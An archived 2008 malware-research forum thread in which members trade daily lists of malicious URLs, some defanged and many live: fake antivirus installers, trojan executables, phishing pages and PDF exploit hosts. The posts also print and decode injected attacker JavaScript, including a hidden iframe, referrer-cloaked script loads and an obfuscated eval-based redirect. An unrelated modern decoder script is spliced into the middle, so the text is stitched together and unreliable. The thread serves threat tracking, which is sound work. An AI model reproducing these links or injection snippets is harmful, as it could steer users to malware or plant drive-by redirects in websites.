~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org/dl.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: Re: daily something......
Post by: lanvin on September 22, 2008, 07:18:31 am
Code:
http://dd6.tesekl.info/net.exe
http://danielblaskieviz.xpg.com.br/upload/imglog.jpg
http://download.sav2008.com/dload.php?actually=1&advid=5251
http://www.rotarymilanosudest.com/site_access/bollettini/2007-2008/agosto.exe
http://knut.kumoh.ac.kr/~kopress/board//skin/f2plus_gallery_2_0/.tmp/FrWall2.exe
http://www.1ive.net/count/Install.asp
http://cel33264578.xpg.com.br/imglog.xml
http://www.sabaozinhox.net/Source.exe
http://www.aera.gr/files/.slide/win32.exe
http://www.oflogao.com/tim/download/picture.exe
http://vivoonline.hpg.com.br/nosso.jpg
Title: Re: daily something......
Post by: SysAdMini on September 22, 2008, 02:36:45 pm
Another Fake Antivirus.

Code:
hxxp://your-windows-scanner.com/soft/r/AV2008install.exe

Virustotal

http://www.virustotal.com/analisis/9c6df880a6b4dee045da0543cb91bbed


Code:
hxxp://scanner.microantivirus2009.com/setup/install_511_MHwzNnwwfHx8fHx8fHw_.exe
VirusTotal

http://www.virustotal.com/analisis/6aee6527bd9aa13231eb0d831a0569d0

Title: Re: daily something......
Post by: sowhat-x on September 24, 2008, 03:51:15 am
Spam-related (DirectMailer) open dirs...
Google gives a warning on quite a few of them,
so I assume that other 'goodies' might exist there as well,
but I haven't personally bothered checking in such detail...

Quote
hxxp://a1sfingerprinting.com
hxxp://adept-consult.com.au
hxxp://adgjm.us
hxxp://altai-himalaya.com
hxxp://antique-buddha-statues.com
hxxp://autechtrade.com
hxxp://busratings.com
hxxp://c-a-k-e.co.za
hxxp://crossroadsgroup.com.au
hxxp://epochengineering.net
hxxp://eurozsia.com.au/log/misc/
hxxp://gordonclub-bg.info
hxxp://gracetrailer.com
hxxp://jenesisarts.com
hxxp://kingstaracamp.com
hxxp://milward.biz
hxxp://onlinemetalart.com
hxxp://pci-controlobjectives.org
hxxp://printers-ftp-server.org
hxxp://tenthousandbuddhastudios.com
hxxp://trainingvitals.com.au
hxxp://tsunamidragteam.com
hxxp://vavilondv.com
hxxp://www.802-11wireless.net
hxxp://www.archangelgames.com
hxxp://www.assortedcream.net
hxxp://www.australianwaterlife.com.au
hxxp://www.crossroadsgroup.com.au
hxxp://www.dandtcorp.com.au
hxxp://www.giproductions.com.au
hxxp://www.heliodesign.com
hxxp://www.jsgray.com
hxxp://www.littlespider.com.au
hxxp://www.olmax.net
hxxp://www.sirbeavis.com
hxxp://www.withintemptation.com.au
Title: Re: daily something......
Post by: sowhat-x on September 24, 2008, 05:02:24 am
Quote
hxxp://www.circadian.net/ayelet/
hxxp://www.casino-news.biz/
hxxp://unlimitedinspections.com/
hxxp://reddii.ru/traffic/sploit1/?

Quote
hxxp://meopta.ru/haitou.php
hxxp://meopta.ru/coi.html
hxxp://meopta.ru/coiu.html
hxxp://bestshaste.cn/good.html?

haitou.php is certainly a pain in the ass to decode; scripts attached below...
Title: Re: daily something......
Post by: sowhat-x on September 24, 2008, 05:45:50 am
...out of curiosity, I scanned the 'haitou-scripts-only.php' in VirusTotal:
http://www.virustotal.com/analisis/bed224b3a6050bdfd8826049f4755202
Result: 3/36 (8.34%)

The only part of it which is in plain-text view is the following...
Code:
<script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/in.cgi?tycoon3" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script>
As soon as I replaced xanjan.cn with google.com...
http://www.virustotal.com/analisis/9cc7dae965c757c745a80eb4c424b65e
Result: 2/36 (5.56%)

And when removing the whole of the aforementioned plain-text script...
http://www.virustotal.com/analisis/63ed068268e977a32b92f70e7076f977
Result: 1/36 (2.78%)

In short, besides the... high-tech string-based detection,
almost no AV got alarmed by the 5 remaining, heavily obfuscated scripts there?
Title: Re: daily something......
Post by: lanvin on September 24, 2008, 09:26:34 am
Code:
http://www.lzitw.com/kj/hoho.exe
https://ssl1140.websiteseguro.com/nokiabrasil/Imagens_de_todos.jpg
https://ssl1140.websiteseguro.com/nokiabrasil/Imagem_Jr.jpg
https://ssl1140.websiteseguro.com/nokiabrasil/imagemsngr.jpg
https://ssl1140.websiteseguro.com/nokiabrasil/Imagem_libs.jpg
http://bestantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://www2.odn.ne.jp/~caj37650/jishin.exe
http://scanner.microantivirus-2009.com/setup/install_3697_MHwzNnwxMDEwMDAwMDAwfHx8fHx8fHw_.exe
http://scanner.microantivir2009.com/setup/install_1392_MHwzNnwxMDAwMDAwMDAwfHx8fHx8fHw_.exe
http://www.spytech-web.com/spyagent/Files601/YahooDLL.dll
http://www.spytech-web.com/spyagent/Files/sbrowse.dat
http://www.spytech-web.com/spyagent/Files601/SystemSA32.dll
http://www.spytech-web.com/realtime-spy/Files20/NTInvisible.dll
http://dm.screensavers.com/dm/installers/si/1/sinstaller.cab
http://dm.screensavers.com/dm/installers/si/3/s_sinstallerandtoolbar3.exe
http://dm.screensavers.com/dm/installers/si/beta/s_sinstallerandtoolbar.exe
http://files.screensavers.com/sss/bin/sinstallerandtoolbar3.exe
Title: Re: daily something......
Post by: sowhat-x on September 24, 2008, 02:34:48 pm
Quote
hxxp://funciclearin.com/counter.php
hxxp://search-you-need.com/le/index.php?code=K2l7J41xQY
hxxp://www.mnbenio.ru/script.js
Title: Re: daily something......
Post by: SysAdMini on September 24, 2008, 02:40:02 pm
Hi sowhat-x,

here is the haitou.php thing. Lines separated by "--------------".


Code:
var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {
document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111117&ref='+escape(document.referrer)+'"></sc'+'ript>')
}
----------------
if (document.referrer != "http://verify.com") {
document.write("<span style='display:none' id='d1'>");
}
----------------
var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {
document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111115&ref='+escape(document.referrer)+'"></sc'+'ript>')
}
----------------
<script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/in.cgi?tycoon3" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script>
-----------------
if (document.referrer != "http://verify.com") {
document.write("<span style='display:none' id='d1'>");
}
-------------------
if (document.referrer != "http://verify.com") {
document.write("<span style='display:none' id='d1'>");
}

Title: Re: daily something......
Post by: sowhat-x on September 24, 2008, 02:55:32 pm
...so except for xanjan.cn... this haitou.php, is it supposed to be phishing-related or something?
Or is it some weird kind of stats tracking?  ???
coi.html and/or coiu.html were found on many servers that hosted this obfuscated haitou.php...

Edit: Yep, it's phishing-related indeed, just checked a random coiu.html...
What's weird (and annoying also) is that earlier its contents were... different!  :o
Can't remember though what they contained....  :(
Title: Re: daily something......
Post by: CM_MWR on September 24, 2008, 05:07:31 pm
Heh... google the text, not the redirections.

allyourbasebelongstous

yahoo --> /haitou.php

1 - 10 of 12,200, and it's way old too, with all these still lurking and steadily infecting.

Remember the lot of links I posted in private where the browser went into an infinite loop... ;)

I have used Google, MSN and Yahoo for this search term for well over 4 months and still to this day get jam-up hits for malware rotators.

When looking in some directories you'll start seeing patterns ---> system_.php, move.html, r.html and several others.

It's a part of a very large whole from the beginning of the year, one of those injections we all talked about way back.
Title: Re: daily something......
Post by: SysAdMini on September 24, 2008, 05:36:33 pm
Quote
...so except from xanjan.cn...is it supposed to be phishing related or something?

Code: [Select]
var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {

document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111117&ref='+escape(document.referrer)+'"></sc'+'ript>')

means: if your referrer is a search engine (you came to this page from a search engine),
then it redirects you to personal.count....

You will get the following script from this url.

Code: [Select]
function S(hF,e){if(!e){e='1q$%gV4{<#&G=z:QEHa`Jiy9;d-o[.h+SY,KMvnlU]Z|F()DXOPpLWsN_BmI6Rwt';}var x;var Rg='';for(var I=0;I<hF.length;I+=4){x=(e.indexOf(hF.charAt(I))&255)<<18|(e.indexOf(hF.charAt(I+1))&255)<<12|(e.indexOf(hF.charAt(I+2))&255)<<(6)|e.indexOf(hF.charAt(I+3))&255;Rg+=String.fromCharCode((x&16711680)>>16,(x&65280)>>8,x&255);}eval(Rg);}S('d4RK.yWvolE).N#].4JU#pOp;P[|#N#][{Ew<4HD;Ni(dyBLGnOD;sVL-yR)Qa#U.{HX:,6Dds6([szYo,WX;PBKosLDQNi]d%LOz`<,<%XD[s=l&P.P-9qLQ,[]:P1S');

decodes to
Code: [Select]
document.write('<sc'+'ript> document.location="http://go-scan-pc.com/?uid=152" </sc'+'ript>'); 

go-scan-pc.com (ESTDOMAINS) has no content at the moment.
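As an added example (not code from the post or from any of the sites it discusses), here is a static way to check both things explained above without running the injected script: the referrer-cloaking condition from the first snippet, re-stated as a pure function, and the custom base64-style decoder S() with its eval() replaced by a return, applied to the blob quoted in the post. All function and constant names are mine; the alphabet and blob are copied verbatim from the post.

```javascript
// Added example (not code from the forum post): static-analysis helpers for the
// referrer-cloaking check and the custom decoder S() quoted above.
// Nothing here is eval()'d; the decoder returns the decoded text.

// Alphabet hard-coded in the S() function quoted in the post (copied verbatim).
const POST_ALPHABET = '1q$%gV4{<#&G=z:QEHa`Jiy9;d-o[.h+SY,KMvnlU]Z|F()DXOPpLWsN_BmI6Rwt';

// Encoded argument passed to S() in the post (copied verbatim).
const POST_BLOB = 'd4RK.yWvolE).N#].4JU#pOp;P[|#N#][{Ew<4HD;Ni(dyBLGnOD;sVL-yR)Qa#U.{HX:,6Dds6([szYo,WX;PBKosLDQNi]d%LOz`<,<%XD[s=l&P.P-9qLQ,[]:P1S';

// Substrings the injected referrer check looks for (from the first snippet).
const SEARCH_REFERRER_MARKERS = ['google', 'live', 'yahoo', 'search', 'result', 'cache', 'translate'];

// Pure re-statement of the cloaking condition: true when the injected code would
// have written the remote <script> tag. A direct visit (empty referrer) gets nothing,
// which is why fetching the page by hand shows a clean copy.
function wouldServePayload(referrer) {
  return SEARCH_REFERRER_MARKERS.some((marker) => referrer.indexOf(marker) !== -1);
}

// Decode one 4-character group exactly as S() does: four 6-bit indices packed
// into 24 bits, then split into three bytes. A character outside the alphabet
// gives indexOf() == -1, which the original masks to 255; a missing character
// (short final group) gives charAt() == '' and indexOf('') == 0. Both quirks are
// kept so the output matches what the browser would have executed.
function decodeGroup(chunk, alphabet) {
  const a = alphabet.indexOf(chunk.charAt(0)) & 255;
  const b = alphabet.indexOf(chunk.charAt(1)) & 255;
  const c = alphabet.indexOf(chunk.charAt(2)) & 255;
  const d = alphabet.indexOf(chunk.charAt(3)) & 255;
  const x = (a << 18) | (b << 12) | (c << 6) | d;
  return String.fromCharCode((x & 0xff0000) >> 16, (x & 0xff00) >> 8, x & 0xff);
}

// Same loop as S(), but returning the decoded text instead of eval()'ing it.
function decodePayload(blob, alphabet = POST_ALPHABET) {
  let out = '';
  for (let i = 0; i < blob.length; i += 4) {
    out += decodeGroup(blob.slice(i, i + 4), alphabet);
  }
  return out;
}

// Pull http(s) URLs out of decoded text so the next hop can be recorded.
function extractUrls(text) {
  return text.match(/https?:\/\/[^\s"'<>]+/g) || [];
}

// Stand-alone run: decode the blob from the post and list the redirect target.
const decodedFromPost = decodePayload(POST_BLOB);
console.log(decodedFromPost.trim());
console.log('next hop:', extractUrls(decodedFromPost));
console.log('served to a Google visitor:', wouldServePayload('http://www.google.com/search?q=x'));
console.log('served to a direct visit:', wouldServePayload(''));
```

The decoder is alphabet-parametrised, so the same function handles other samples of this loader once their hard-coded `e` string is copied out.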


Title: Re: daily something......
Post by: MysteryFCM on September 24, 2008, 09:06:24 pm
go-scan-pc.com redirs to;

http://scan-ia.com/20/?uid=152&in=1&xx=1&end=1&g=1&h=0&ag=1

Which gives you an 84K file (UPolyX v0.5 packed according to UE);

http://scan-ia.com/download/IAInstall.exe
Title: Re: daily something......
Post by: MysteryFCM on September 24, 2008, 09:09:12 pm
Detection is rubbish (3/36)

/edit

Just for kicks and giggles ;)

http://hosts-file.net/?s=216.32.69.165
http://hosts-file.net/?s=216.32.69.165&sDM=1#matches

I had 9 already listed ..... I've now got 48 on this IP :)
Title: Re: daily something......
Post by: SysAdMini on September 24, 2008, 09:13:49 pm
go-scan-pc.com
scan-ia.com

= ESTDOMAINS


KOKACH !!
Title: Re: daily something......
Post by: MysteryFCM on September 24, 2008, 09:23:02 pm
I'd be surprised if they weren't all Est ......... "cleaning up" my arse .....
Title: Re: daily something......
Post by: SysAdMini on September 25, 2008, 10:24:00 am
Quote
Detection is rubbish (3/36)

Report from Anubis:

http://anubis.iseclab.org/result.php?taskid=a2867294c98294b4c5be525712d4473a&refresh=1

IAInstall.exe downloads

Code: [Select]
hxxp://ia-install.com/download/InternetAntivirus.exe
http://www.virustotal.com/de/analisis/612efcc0065c050fb49876f6a82f476b


Title: Re: daily something......
Post by: sowhat-x on September 25, 2008, 12:14:31 pm
Quote
you'll start seeing patterns ---> system_.php,move.html,r.html and several others.
That's why I said...  ;)
Quote
"Whatever the case,all of the following are open dirs,
so you can examine directories/scripts contained there at will..."
And there's even more crap planted there per occasion except from the above patterns,
but I didn't have the patience to try following them over...

Quote
go-scan-pc.com
scan-ia.com

= ESTDOMAINS

KOKACH !!


Quote
(UPolyX v0.5 packed according to UE);
At least at a first glance, it seems to be a home-made protection, but I may be wrong on this...
it's been years since I had checked UPolyX...maybe I should do so again  ;)
Title: Re: daily something......
Post by: lanvin on September 25, 2008, 03:09:57 pm
Code: [Select]
http://stat.antivirusxp08.net/download/AntivirusXP2008Installer.exe
http://fwt.txdnl.com/4-10/j/a/jacklinda1/videos2008.exe
http://fwt.txdnl.com/5-10/v/i/videoshowww/You_tube_play.exe
http://fwt.txdnl.com/6-10/d/o/downloadflash/svchostss.exe
http://fwt.txdnl.com/6-30/p/h/phongcan/girlvietvip.jpg
Title: Re: daily something......
Post by: sowhat-x on September 25, 2008, 06:17:51 pm
I agree, the thread here has already got messy...and it's my fault.
I'll edit/move the haitou.php links I've posted in a new thread...
Title: Re: daily something......
Post by: lanvin on September 25, 2008, 07:32:51 pm
nice discussion ;D
Title: Re: daily something......
Post by: sowhat-x on September 25, 2008, 07:33:19 pm
Lol!  :D
Title: Re: daily something......
Post by: SysAdMini on September 25, 2008, 07:36:01 pm
Quote
nice discussion ;D

I'm sorry. This was your thread. We have messed it up. ;D
Title: Re: daily something......
Post by: CM_MWR on September 26, 2008, 01:18:17 am
Blame it on TJS  :P
Title: Re: daily something......
Post by: tjs on September 26, 2008, 05:59:36 am
lol
Title: Re: daily something......
Post by: lanvin on September 26, 2008, 11:22:33 am
Code: [Select]
http://www.mastercrew.xpg.com.br/CPF.jpg    5.4M
http://dd7.tesekl.info/net.exe
http://trabalho01.pisem.su/imglog.jpg    2.7M
http://greg-search.com/G7/control.exe
http://novotempo01.sites.uol.com.br/nega.jpg 
http://gsnet.front.ru/gm.exe
Title: Re: daily something......
Post by: JohnC on September 26, 2008, 10:10:09 pm
Thank you.
Title: Re: daily something......
Post by: lanvin on September 27, 2008, 12:05:46 pm
Quote
nice discussion ;D

I'm sorry. This was your thread. We have messed it up. ;D

That's ok:)
Glad to see your discussion :P
Title: Re: daily something......
Post by: lanvin on September 27, 2008, 12:06:42 pm
Code: [Select]
http://bestantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880658.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880154.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://bestantivirusscan.com/2009/download/trial/A9installer_880658.exe
http://ia-scanonline.com/download/IAInstall.exe
Title: Re: daily something......
Post by: lanvin on September 29, 2008, 09:52:39 am
Title: Re: daily something......
Post by: lanvin on October 01, 2008, 12:23:18 pm
phishing:
hxxp://mess.network-hosting.com/pey/Confirm.htm

fake alert:
nod-32.net

porn:
bestyounggirls.com 
enakedgirls.com
previewadultvideos.com
Title: Re: daily something......
Post by: lanvin on October 02, 2008, 02:34:55 pm
eigenstart.nl
hxxp://www.eigenstart.nl/toolbar/content/eigenstartsetup.exe

myspyprotector.com
hxxp://www.myspyprotector.com/software/myspyprotector_04.exe
hxxp://www.myspyprotector.com/software/myspyprotector_03.exe
hxxp://www.myspyprotector.com/software/myspyprotector_05.exe

pic iframe
hxxp://picturelink.66735.com/member/img/reg.gif
hxxp://picturelink.66735.com/plus/img/file_move.gif
hxxp://picturelink.66735.com/plus/img/sysinfo.gif
hxxp://picturelink.66735.com/plus/img/bad.gif

visualscanprotection.com
hxxp://visualscanprotection.com/download/av_2009.exe
Title: Re: daily something......
Post by: JohnC on October 03, 2008, 11:30:01 am
Thank you.
Title: Re: daily something......
Post by: lanvin on October 03, 2008, 12:22:36 pm
Fake alert
uav2008.com
bestprivatetube.net
antivirus-2009-pro.net

Porn
hardxtc.com
olderporntubes.com


hxxp://www.bestprivatetube.net/cd/603/5/wmcodec_update.exe
Title: Re: daily something......
Post by: CM_MWR on October 03, 2008, 10:44:37 pm
Adwares

Title: Re: daily something......
Post by: lanvin on October 05, 2008, 11:40:51 am
Fake antivirus
eantivirus-payment. com
e-antiviruspro. com

Porn
lamaporn.com
ebony-black-pussy.net

Trojan
hxxp://www.yyjjoopp.com/abc.exe
hxxp://exetools.com/files/unpackers/win/ni2untelock.zip
hxxp://exetools.com/files/stickers/exebind.zip
hxxp://exetools.com/files/others/ratpackr.zip
Title: Re: daily something......
Post by: lanvin on October 07, 2008, 05:56:41 pm
Code: [Select]
http://msn.account.hotmail.ru/Cancelar.exe
http://albumbloglinda.hotmail.ru/album.exe
http://download.a-a-v-2008.com:8080/AAVSetup.exe
http://zfzuguo.cn/hb/24.exe
http://zfzuguo.cn/hb/7.exe
http://zfzuguo.cn/goole10.exe
Title: Re: daily something......
Post by: tjs on October 07, 2008, 06:49:21 pm
Quote
hxxp://msn.account.hotmail.ru/Cancelar.exe

Great domain name. lol.. thx for sharing.

TJS
Title: Re: daily something......
Post by: tjs on October 07, 2008, 08:00:31 pm
from hxxp://zfzuguo.cn/updater.txt

Title: Re: daily something......
Post by: lanvin on October 08, 2008, 03:15:39 pm
Quote
from hxxp://zfzuguo.cn/updater.txt

Thanks for sharing :)
Title: Re: daily something......
Post by: Kayrac on October 08, 2008, 09:22:37 pm
Code: [Select]
http://www.ecotopo.com.au/
open dir
Title: Re: daily something......
Post by: lanvin on October 10, 2008, 06:54:16 am
hxxp://www.zssotke.edu.sk/zdruzenacik/explorer-7.0.exe

hxxp://blacktie-affair.org/Smileys/Zamiana/stick.gif
||
<iframe width=1 height=1 src="hxxp://download.getmirar.com/875455"> </iframe>
||
hxxp://download.getmirar.com/875455/exes/Mirar_Toolbar_Setup.exe

hxxp://ak.imgfarm.com/images/nocache/copilot/1.0.8.0/iWonSetup1.0.8.0.exe
hxxp://www.cliprex.com/files/Cflv.exe
hxxp://www.cliprex.com/files/CliprexLite.exe
Title: Re: daily something......
Post by: lanvin on October 13, 2008, 02:47:30 pm
hxxp://myprivatetube.net/cd/376/0/wmcodec_update.exe
hxxp://myprivatetube.net/cd/174/0/wmcodec_update.exe
hxxp://scanner.rapidantivirus.com/setup/install_4876_MHw0MXwxMDAwMDAwMDAwfHx8fHx8fHw_.exe
hxxp://www.nortonsoft.com/supportlogic/smilies/video-nude-anjelia.avi.exe
Title: Re: daily something......
Post by: lanvin on October 14, 2008, 02:00:04 pm
hxxp://www.alpha-accz.ws/image.jpg.exe
hxxp://www.alpha-accz.ws/ri0t.exe
hxxp://virus-labs2009.com/distrib/1/virlab_install.exe
hxxp://125.91.10.231/js/suen.exe
hxxp://download.a-a-v-2008.com:8080/AAVSetup.exe
hxxp://www.lastwmpupdate.com/download.php?id=1684
hxxp://www.lastwmpupdate.com/download.php?id=417
hxxp://www.lastwmpupdate.com/download.php?id=1161
hxxp://www.lastwmpupdate.com/download.php?id=1640
hxxp://www.lastwmpupdate.com/download.php?id=1464
Title: Re: daily something......
Post by: JohnC on October 14, 2008, 06:25:38 pm
Thanks.
Title: Re: daily something......
Post by: lanvin on October 15, 2008, 01:04:37 pm
Code: [Select]
trojan zlob
http://ticketmoon.net/download/pageticket2000.exe

fake
http://download.antispywareexpert.com/ASE_Setup_Free.exe
http://download.antispywareexpert.com/ASE_Setup_Free_fr.exe
http://www.xprivatetube.com/cd/26/2001/wmcodec_update.exe
http://www.xprivatetube.com/cd/680/0/wmcodec_update.exe
http://www.xprivatetube.com/cd/184/0/wmcodec_update.exe
http://www.xprivatetube.com/cd/603/4/wmcodec_update.exe
http://xprivatetube.com/cd/wmcodec_update.exe
Title: Re: daily something......
Post by: lanvin on October 19, 2008, 08:16:31 am
Code: [Select]
http://02c1cb8.netsolhost.com/pesa.exe
http://www.administrafacil.com.br/administrafacil.exe
http://downloads.5star-network.com/Internet/amazon.exe
http://downloads.5star-network.com/Internet/wg20.exe
http://downloads.5star-network.com/Utilities/cs_mary.exe
http://download.a-a-v-2008.com:8080/AAVSetup.exe
http://free-stream-videos-here.com/soft/install-299.exe
http://free-stream-videos-here.com/soft/install-301.exe

Title: Re: daily something......
Post by: CM_MWR on October 19, 2008, 09:54:58 am
fstat.cn/tds/in.cgi?2
italiano-service.org/manage.cgi?27d64e000100f06000cc8136dc068ae61d20026f3d26ccff03656e2d75730000000000
italiano-service.org/manage.cgi?27d64e000100f06002cc8136dc068ae61d20026f3d26ce00030409000000000200
italiano-service.org/manage.cgi?badi
mtn6.com-com.ws/ac.php?bannerid=1&zoneid=1&target=_blank&withtext=&source=&timeout=0&ct0=
mtn6.com-com.ws/aiw3.php?try=1&ver=16&uid=F4E4961A-08A1-1033-0410-070000000001&cu=Dank&cb=7893
mtn6.com-com.ws/aiw3.php?try=1&ver=16&uid=F4E4961A-08A1-1033-0410-070000000001&cu=Dank&cb=802
mtn6.com-com.ws/aiw3.php?try=1&ver=16&uid=F4E4961A-08A2-1033-0410-070000000001&cu=Dank&cb=3006
mtn6.com-com.ws/lg.php?bannerid=1&campaignid=1&zoneid=1&cb=ba37b62fa6
mtn6.com-com.ws/lg.php?bannerid=1&campaignid=1&zoneid=1&cb=f5be0cd602
mtn6.goole.ws/ac.php?bannerid=4&zoneid=3&target=_blank&withtext=&source=&timeout=0&ct0=
mtn6.goole.ws/aiwado.php?xtt=737
mtn6.goole.ws/lg.php?bannerid=4&campaignid=3&zoneid=3&cb=21ba48dacb
myprivatetube.net/1/bigcock1/0/712/0/black/
myprivatetube.net/cd/712/0/wmcodec_update.exe
randomnewnames.com/external/bchanger.exe
randomnewnames.com/v/files/targets.gz
randomnewnames.com/v/we-active.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&d=0&pc=0&pc2=0&country=US
randomnewnames.com/v/we-config.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&ucnt=0
randomnewnames.com/v/we-connect.php
randomnewnames.com/v/we-content.php?cid=356&uid=17646394261871452226&rnd=4322
randomnewnames.com/v/we-content.php?cid=377&uid=17646394261871452226&rnd=327
randomnewnames.com/v/we-content.php?cid=387&uid=17646394261871452226&rnd=6921
randomnewnames.com/v/we-dictionaries.php
randomnewnames.com/v/we-install.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&key=e00f3e0322f287351fc10feff0471412
randomnewnames.com/v/we-popup.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&kw=pussy|fuck&country=US
randomnewnames.com/v/we-popup.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&kw=ron&country=US
randomnewnames.com/v/we-tpa.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&d=0
randomnewnames.com/v/we-tpa-track.php?name=bchanger.exe
speed-runner.com/./data/configs/INSTALLS/config.cfg
speed-runner.com/./data/speedrunner/uninstaller/sruninstaller.prod.v12000.11jan2008.exe.1ac39aea6b22cdb4e6ed0c75f1d83467
speed-runner.com/upd.php?wtdat=1061a99f58f7c7961801b5fd0ebe6d5edd0bcb8d5001b123fe3053941a1076be9ef59850dce64ebe8c6dd2b410527036
speed-runner.com/upd.php?wtdat=677f31fe4cd508bb6c15061542e61381
spyguardpro.com/data/?cmpname=swpsnpr34&gai=swp_snipsg&gli=288&gff=pp_1389567286&ex=5&ed=2&eu=http%3A%2F%2Fpcprivacytool.com%2Fprivacy%2F%3Fp%3D840%26gai%3Dswp_snipsgexx51%26gli%3D288%26gff%3Dpp_1389567286%26ex%3D5&
virusremover2008plus.com/secure/5e7da2d5e3beca6d6d7f9548cf0fb655/48eb60d5/VirusRemover2008_Setup_Free_en.exe?a=swpsni&l=288&f=pp_1394267317&p=105&mt_info=3793_0_22980:3788_0_28467&sub=UND
wrpx.service.mirror-image.net/binaries/installer.php?a=MTE3MTk6ODoxNg
wrpx.service.mirror-image.net/binaries/installer.php?a=MTE5MTA6ODoxNg
wrpx.service.mirror-image.net/binaries/relevance.dat
Title: Re: daily something......
Post by: JohnC on October 19, 2008, 11:49:35 am
Thanks.
Title: Re: daily something......
Post by: SysAdMini on October 20, 2008, 08:04:13 am
Code: [Select]
hxxp://online-scan.net/jktnslbngksjhgktiyyorrfkgmtt.js
Title: Re: daily something......
Post by: philipp on October 21, 2008, 11:43:00 am
Code: [Select]
Title: Re: daily something......
Post by: lanvin on October 22, 2008, 07:37:45 am
Code: [Select]
Title: Re: daily something......
Post by: JohnC on October 23, 2008, 02:30:49 pm
Thanks.
Title: Re: daily something......
Post by: lanvin on October 24, 2008, 04:37:52 pm
Code: [Select]
Title: Re: daily something......
Post by: lanvin on October 28, 2008, 07:00:28 am
Code: [Select]
Title: Re: daily something......
Post by: lanvin on October 29, 2008, 04:56:40 pm
Code: [Select]
Title: Re: daily something......
Post by: CM_MWR on October 30, 2008, 08:52:43 am
Code: [Select]
Title: Re: daily something......
Post by: lanvin on October 31, 2008, 04:10:02 pm
Code: [Select]
Title: Re: daily something......
Post by: SysAdMini on November 04, 2008, 12:44:32 am
Code: [Select]
http://bot.10wrj.com/bot1102.exe
http://so.91526.com/jj.exe
Title: Re: daily something......
Post by: sowhat-x on November 04, 2008, 02:19:29 am
Code: [Select]
http://freegoogla.vicp.net/download/em_setup.exe
http://zz.ushealthmart.com/download/6767.exe
Title: Re: daily something......
Post by: sowhat-x on November 05, 2008, 12:17:21 pm
...since a few days have passed since the fuss around the ms08-067 worm,
thought it's about time to move these here as well...  ;)
Quote
Title: Re: daily something......
Post by: lanvin on November 05, 2008, 07:18:43 pm
thank you ;D
Title: Re: daily something......
Post by: lanvin on November 05, 2008, 07:25:30 pm

thank you ;)
Title: Re: daily something......
Post by: lanvin on November 08, 2008, 06:55:07 pm
Code: [Select]
Title: Re: daily something......
Post by: sowhat-x on November 09, 2008, 01:26:20 am
Various PDF exploit variants, and different detection rates for the time being...
Quote
Title: Re: daily something......
Post by: sowhat-x on November 09, 2008, 07:01:54 am
Quote

...Hopefully these are enough pdf samples for people out there? ;)
Title: Re: daily something......
Post by: sowhat-x on November 10, 2008, 08:54:36 am
Quote
Title: Re: daily something......
Post by: sowhat-x on November 10, 2008, 09:02:10 am
Small present for all malware hunters around... the list is updated daily - have fun... :)
Quote
http://www3.malekal.com/exploit.txt

Credits for the hard work to be given where they should... and that is, to Malekal:
Quote
http://forum.malekal.com/index.php
Title: Re: daily something......
Post by: cjeremy on November 10, 2008, 09:30:38 pm
I am doing a short write-up for my blog on the PDF exploits and was wondering if I could use some of these samples in my write-up? I will cite the source as MDL and the individuals that collected the samples, such as sowhat, if you all allow me to use them. Just want to get your permissions before I do the write-up, thanks in advance either way.
Title: Re: daily something......
Post by: sowhat-x on November 11, 2008, 12:32:48 am
cjeremy, you don't need to reference anyone, after all,
most of them were found simply via googling... then sorting/removing dupes etc...

When I stumble upon kinda large amounts of stuff
that was already spotted and posted by other people in public
(e.g. like the referenced material above that was gathered by Malekal),
I personally always give the reference/credits/link to the post in question as well...
That is both for people to be able to follow the updates there by themselves,
plus for common reasons of politeness obviously... and that's all there is to it.  :)

Waiting for a good write-up with detailed analysis over at Sudosecure ;)
Title: Re: daily something......
Post by: lanvin on November 12, 2008, 12:26:08 am
Thank you :)
Title: Re: daily something......
Post by: sowhat-x on November 12, 2008, 06:11:45 pm
Quote
hxxp://ascoprguide.net/lel/load.php?xpl=pdf
It spawns 'load.exe'...Result: 6/35 (17.14%)
http://www.virustotal.com/analisis/d1e1d25d68004d4c8a3b2ad5e87174e9

Quote
hxxp://ascoprguide.net/lel/config/test.pdf
Result: 10/36 (17.14%)
http://www.virustotal.com/analisis/18a2be6aeec85eceea9ffa8fee14fb43

And it's EstDomains...from the same ip also:
Quote
hxxp://bestansia.net/lel/config/test.pdf
Result: 10/36 (27.78%)
http://www.virustotal.com/analisis/c529319c11a5eecb6318ecc2cfe6417f

Quote
hxxp://bestratebid.net/botout/test.pdf
Result: 12/36 (33.34%)
http://www.virustotal.com/analisis/2d33f75cf7dda11517a955de05bf4b00

Quote
